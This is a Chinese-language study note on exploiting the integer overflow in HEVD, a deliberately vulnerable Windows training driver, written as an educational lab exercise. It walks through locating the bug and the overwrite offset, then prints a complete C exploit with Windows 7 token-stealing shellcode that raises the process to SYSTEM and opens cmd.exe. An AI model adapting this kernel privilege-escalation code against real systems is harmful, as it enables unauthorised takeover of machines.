HEVD学习笔记——IntegerOverflow

0x00 漏洞原理

每个类型占用的内存空间是有限的，存储大于最大支持值/小于最小支持值的数据就称为整数溢出/整数下溢。整数溢出本身不会导致任何的代码执行，但可能会导致栈溢出或堆溢出，从而导致任意代码执行。

比如，在32位系统上，无符号整型数据的长度为4字节，占32bit表示的数的范围是0x00000000~0xffffffff，那么最大值0xffffffff+1将变成33bit的数，但内存空间只能容纳32位，将高于32位的部分舍弃，该无符号整数值将为0。

0x01 漏洞定位

IDA打开HEVD.sys，找到IrpDeviceIoCtlHandler函数的反汇编：
图片描述
进入TriggerIntegerOverflow函数的反汇编，Size是用户缓冲区长度，一个无符号整数，占4字节的空间。代码里的验证条件if(Size+4<0x800)，如果满足，将用户缓冲区复制进内核缓冲区，遇到0x0BAD0B0B0则停止复制。

可以发现，很大的Size如0xffffffff+4=3能绕过代码中的验证条件，存在整数溢出漏洞。绕过验证条件之后可以构造足够大的数据造成栈溢出，进而执行任意代码。

0x02 漏洞利用

绕过验证条件之后，我们构造足够大的数据进行对HEVD进行栈溢出。首先定位溢出点，我们可以用msf的工具生成模式字符串（kali系统/usr/share/metasploit-framework/tools/exploit下的pattern_create.rb）：
图片描述
我们将用户缓冲区大小设置为0xffffffff，将生成的模式字符串作为用户缓冲区数据，调用DeviceIoControl通过IO控制码0x222027与HEVD驱动进行通信：

执行客户端程序之前，我们用Windbg进行双机调试，在TriggerIntegerOverflow函数处下断点，再运行，触发断点：
图片描述
继续运行，触发访问错误，eip为35724334：

我们使用pattern_offset.rb脚本查看35724334在模式字符串中的偏移为2084即0x824：

说明缓冲区的0x824开始的四字节会覆盖到一个可执行的地址，我们只要将shellcode地址写到这里就可以执行起来，然后将0x828处设置为要求的末尾值0x0BAD0B0B0即可。
完整利用代码：

#include<stdio.h>
#include<Windows.h>
 
// 1.设置符号链接名称
#define DEVICE_LINK_NAME L"\\\\.\\HackSysExtremeVulnerableDriver"
 
// 2.控制码定义（与0环一样）
#define HEVD_INTEGER_OVERFLOW 0x222027
 
VOID __declspec(naked)TokenStealingPayloadWin7_5() {
    __asm
    {
        pushad; Save registers state
 
        ; Start of Token Stealing Stub
        xor eax, eax; Set ZERO
        mov eax, fs: [eax + KTHREAD_OFFSET] ; Get nt!_KPCR.PcrbData.CurrentThread
        ; _KTHREAD is located at FS : [0x124]
 
        mov eax, [eax + EPROCESS_OFFSET]; Get nt!_KTHREAD.ApcState.Process
 
        mov ecx, eax; Copy current process _EPROCESS structure
 
        mov edx, SYSTEM_PID; WIN 7 SP1 SYSTEM process PID = 0x4
 
        SearchSystemPID:
        mov eax, [eax + FLINK_OFFSET]; Get nt!_EPROCESS.ActiveProcessLinks.Flink
            sub eax, FLINK_OFFSET
            cmp[eax + PID_OFFSET], edx; Get nt!_EPROCESS.UniqueProcessId
            jne SearchSystemPID
 
            mov edx, [eax + TOKEN_OFFSET]; Get SYSTEM process nt!_EPROCESS.Token
            mov[ecx + TOKEN_OFFSET], edx; Replace target process nt!_EPROCESS.Token
            ; with SYSTEM process nt!_EPROCESS.Token
            ; End of Token Stealing Stub
 
            popad; Restore registers state
            xor eax, eax; Set NTSTATUS SUCCEESS
            pop ebp; Restore saved EBP
            ret 8
    }
 
}
 
VOID EXP_IntegerOverflow() {
    // 3.CreateFile打开符号链接得到设备句柄
    HANDLE hDevice = NULL;
    hDevice = CreateFile(DEVICE_LINK_NAME,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED,
        NULL);
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Error - Unable to obtain a handle to the driver, error code %d\n", GetLastError());
        exit(1);
    }
    // 4.DeviceIoControl给0环发请求并接收返回结果
    DWORD dwRet = 0;
    char exp_IntegerOverflow[0x82C] = {0};
    memset(exp_IntegerOverflow, 'A', sizeof(exp_IntegerOverflow));
    PVOID EopPayload = &TokenStealingPayloadWin7_5;
    memcpy(&exp_IntegerOverflow[0x824], &EopPayload, 4);
    *(PDWORD)(exp_IntegerOverflow+0x828)= 0x0BAD0B0B0;
    DeviceIoControl(hDevice, HEVD_INTEGER_OVERFLOW, exp_IntegerOverflow, \
        0xffffffff, NULL, 0, &dwRet, NULL);
 
    system("cmd.exe");
 
}